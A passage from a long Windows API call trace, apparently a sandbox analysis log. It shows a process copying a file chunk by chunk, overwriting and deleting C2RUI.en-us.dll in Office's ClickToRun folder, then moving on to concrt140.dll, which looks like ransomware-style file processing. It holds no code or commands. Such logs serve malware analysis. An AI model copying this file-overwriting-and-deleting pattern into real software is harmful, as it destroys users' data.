lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.901] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.901] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.901] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.901] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.901] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.901] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.901] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.901] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.902] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.902] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.902] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.902] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.902] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.902] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.902] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.902] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.903] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.903] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.903] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.903] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.903] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.903] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.903] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.903] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.904] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.904] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.904] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.904] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.904] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.904] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.904] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.904] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.905] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.905] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.905] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.905] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.905] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.905] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.905] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.905] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.906] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x4b8, lpOverlapped=0x0) returned 1 [0094.906] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.906] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0094.906] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0x4c0, lpOverlapped=0x0) returned 1 [0094.906] CloseHandle (hObject=0x33c) returned 1 [0094.906] CloseHandle (hObject=0x418) returned 1 [0094.907] AreFileApisANSI () returned 1 [0094.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0094.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x856c0 [0094.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0094.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.914] GetFileType (hFile=0x418) returned 0x1 [0094.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0094.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0094.914] GetLastError () returned 0xb7 [0094.914] SetLastError (dwErrCode=0xb7) [0094.914] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0094.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0094.916] CloseHandle (hObject=0x418) returned 1 [0094.916] AreFileApisANSI () returned 1 [0094.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0094.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x853a0 [0094.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x853a0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0094.916] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll")) returned 1 [0094.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x853a0 | out: hHeap=0x20000) returned 1 [0094.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0094.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.918] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x514a8, dwReserved0=0x1, dwReserved1=0x0, cFileName="concrt140.dll", cAlternateFileName="CONCRT~1.DLL")) returned 1 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0094.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0094.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0094.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0094.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.919] AreFileApisANSI () returned 1 [0094.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll", lpUsedDefaultChar=0x0) returned 72 [0094.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0094.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0094.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0094.919] AreFileApisANSI () returned 1 [0094.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0094.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0094.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 72 [0094.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.919] GetFileType (hFile=0x418) returned 0x1 [0094.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0094.920] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0094.920] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0094.920] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0094.920] CloseHandle (hObject=0x418) returned 1 [0094.920] AreFileApisANSI () returned 1 [0094.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0094.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0094.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 72 [0094.920] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.920] GetFileType (hFile=0x418) returned 0x1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0094.921] CloseHandle (hObject=0x418) returned 1 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree 